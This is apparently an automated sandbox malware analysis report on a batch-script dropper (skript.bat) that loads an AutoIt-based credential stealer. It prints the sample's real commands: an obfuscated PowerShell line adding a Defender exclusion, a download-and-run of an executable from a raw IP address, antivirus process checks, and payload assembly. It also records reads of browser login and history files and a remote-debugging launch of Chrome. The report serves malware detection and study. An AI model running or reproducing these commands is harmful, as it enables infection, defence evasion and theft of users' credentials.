                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Inf.com, 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5415
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4371
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4485
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5282
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com API coverage: 3.9 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204 Thread sleep count: 5415 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544 Thread sleep count: 4371 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1828 Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Windows\System32\timeout.exe TID: 7236 Thread sleep count: 86 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep count: 4485 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep count: 5282 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 Thread sleep time: -18446744073709540s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 7884 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_00406301 FindFirstFileW,FindClose,14_2_00406301
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0075DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_0075DC54
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0076A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_0076A087
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0076A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_0076A1E2
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0075E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,26_2_0075E472
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0076A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,26_2_0076A570
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0072C622 FindFirstFileExW,26_2_0072C622
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_007666DC FindFirstFileW,FindNextFileW,FindClose,26_2_007666DC
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00767333 FindFirstFileW,FindClose,26_2_00767333
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_007673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,26_2_007673D4
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0075D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_0075D921
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_006F5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,26_2_006F5FC8
                    Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
                    Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
                    Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                    Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                    Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                    Source: Web Data.35.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: Web Data.35.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: Web Data.35.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: Web Data.35.dr Binary or memory string: discord.comVMware20,11696487552f
                    Source: Web Data.35.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: Web Data.35.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: svchost.exe, 0000000D.00000002.3403220167.0000027D1D058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3398154367.0000027D17A2B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3403862698.0000000003F85000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: Web Data.35.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: msedge.exe, 00000022.00000003.3307932825.00007CC800324000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
                    Source: Inf.com, 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
                    Source: Web Data.35.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: Web Data.35.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: Web Data.35.dr Binary or memory string: global block list test formVMware20,11696487552
                    Source: Web Data.35.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                    Source: powershell.exe, 00000009.00000002.2490118341.000002549A450000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWft T%SystemRoot%\system32\mswsock.dll
                    Source: Web Data.35.dr Binary or memory string: AMC password management pageVMware20,11696487552
                    Source: Web Data.35.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: chrome.exe, 00000020.00000003.3172505293.000002740CC1A000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000022.00000002.3388224329.0000024C69443000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Web Data.35.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: Web Data.35.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                    Source: Web Data.35.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: Web Data.35.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: Web Data.35.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: Web Data.35.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: Web Data.35.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: Web Data.35.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: Web Data.35.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: Web Data.35.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: Web Data.35.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: Web Data.35.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Web Data.35.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                    Source: Web Data.35.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: Web Data.35.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: Web Data.35.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: Web Data.35.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: Web Data.35.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0076F4FF BlockInput,26_2_0076F4FF
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_006F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,26_2_006F338B
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,14_2_00406328
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00715058 mov eax, dword ptr fs:[00000030h] 26_2_00715058
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_007520AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,26_2_007520AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00722992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00722992
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00710BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00710BAF
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00710D45 SetUnhandledExceptionFilter,26_2_00710D45
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00710F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00710F91

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match File source: skript.bat, type: SAMPLE
                    Source: Yara match File source: amsi64_7456.amsi.csv, type: OTHER
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Inf.com PID: 6636, type: MEMORYSTR
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00751B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_006F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0075BBED SendInput,keybd_event
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0075EC6C mouse_event
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_007514AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00751FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                    Source: Inf.com, 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp, Name.22.dr, Inf.com.15.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Inf.com Binary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00710A08 cpuid
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0074E5F4 GetLocalTime
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0074E652 GetUserNameW
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0072BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

                    Stealing of Sensitive Information

                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match File source: 26.2.Inf.com.41e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Inf.com PID: 6636, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: Inf.com Binary or memory string: WIN_81
                    Source: Inf.com Binary or memory string: WIN_XP
                    Source: Inf.com Binary or memory string: WIN_XPe
                    Source: Inf.com Binary or memory string: WIN_VISTA
                    Source: Inf.com Binary or memory string: WIN_7
                    Source: Inf.com Binary or memory string: WIN_8

                    Remote Access Functionality

                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match File source: 26.2.Inf.com.41e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Inf.com PID: 6636, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00772263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00771C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket

                    MITRE ATT&CK matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact)

                    Behavior Graph ID: 1581178 Sample: skript.bat Startdate: 27/12/2024 Architecture: WINDOWS Score: 100

                    Source | Detection | Scanner | Label | Link
                    skript.bat | 0% | ReversingLabs | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Temp\putt.exe | 5% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
                                                                                                                                                                    high
                                                                                                                                                                    https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://anglebug.com/6692chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://issuetracker.google.com/258207403chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://5.252.155.64/lem.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=ENGImsedge.exe, 00000022.00000002.3389838879.0000024C6B3B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://5.252.155.64/lem.exeProgramW6432=C:msedge.exe, 00000022.00000002.3388154059.0000024C69413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://5.252.155.64/lem.exe#tasklist.exe, 00000011.00000002.2544941760.00000000031B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          unknown
